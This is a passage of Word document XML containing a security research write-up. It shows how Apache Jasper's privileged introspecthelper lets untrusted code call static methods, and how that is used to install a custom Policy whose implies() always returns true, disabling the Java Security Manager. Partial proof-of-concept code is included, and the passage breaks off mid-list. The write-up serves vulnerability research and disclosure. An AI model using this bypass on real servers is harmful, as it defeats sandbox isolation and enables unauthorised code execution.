        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" and its "</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>introspecthelper(Object, String, String, ServletRequest, String, boolean)</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public static void introspecthelper(Object bean, String prop, String value, ServletRequest request, String param, boolean ignoreMethodNF) throws JasperException {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    if (Constants.IS_SECURITY_ENABLED) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        try {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            PrivilegedIntrospectHelper dp = new PrivilegedIntrospectHelper(bean, prop, value, request, param, ignoreMethodNF);</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            AccessController.doPrivileged(dp);</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        } catch (PrivilegedActionException pe) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            Exception e = pe.getException();</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            throw (JasperException) e;</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    } else {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        internalIntrospecthelper(bean, prop, value, request, param, ignoreMethodNF);</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.jasper.Constants.IS_SECURITY_ENABLED</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> is defined as:</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public static final boolean IS_SECURITY_ENABLED = System.getSecurityManager() != null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A new </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PrivilegedIntrospectHelper</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> will be executed on a privileged block. This block will call</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>internalIntrospecthelper(bean,prop,value,request,param,ignoreMethodNF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> which will allow us to do any of the following actions (see </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>source code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> for details):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke any setter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Call any static method that takes one argument (we use any arbitrary method as property setter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As a proof of concept, we took the second route. The method </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>internalIntrospecthelper()</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> invokes our method with our Bean class as the first parameter and this class is unprivileged but Java will omit this parameter in case of static methods. So we were interested in static methods from privileged code that allowed us to disable the Security Manager. The first candidate was</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.setSecurityManager(null)</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> but we are not allowed to pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> as an argument. We could have tried to implement our own Security Manager and set it, but we don’t have </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateSecurityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> permission. What we can do is create our own Policy and set it up calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.Policy.setPolicy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. We only need a Policy where we will override "implies" method and always return "</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The exploit does the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Creates our own Policy which allows us to run any action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            public static class MyPolicy extends Policy {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                 public MyPolicy(){}</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                 public boolean implies(ProtectionDomain </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>paramProtectionDomain, Permission paramPermission){</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                     return true;</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                 }</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
